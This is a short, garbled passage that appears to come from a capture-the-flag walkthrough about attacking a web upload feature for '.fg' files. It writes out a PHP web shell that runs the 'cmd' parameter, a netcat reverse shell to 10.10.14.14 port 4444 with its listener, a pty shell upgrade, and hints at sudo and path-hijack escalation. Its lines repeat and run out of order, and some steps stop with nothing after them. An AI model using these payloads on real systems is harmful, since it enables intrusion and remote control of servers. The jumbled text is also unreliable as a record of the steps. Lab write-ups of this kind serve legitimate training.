Check path hijacking:
eval system($_GET['cmd']); Rename as shell.fg . After upload, the server stores it in /uploads/shell.fg . Trigger via: crackerfg
Use gobuster :
You get RCE as www-data . # On attacker machine nc -lvnp 4444 Via the web shell cmd=nc -e /bin/bash 10.10.14.14 4444 Check path hijacking: eval system($_GET['cmd'])
python3 -c 'import pty;pty.spawn("/bin/bash")' Check sudo: Rename as shell.fg . After upload
Dashboard reveals a file upload feature for "FG (Fingerprint Generator)" scripts ( .fg files). Upload restrictions: only txt and fg . Upload a malicious .fg file:
Run strings /usr/bin/crackerfg – it calls a system command: hashgen .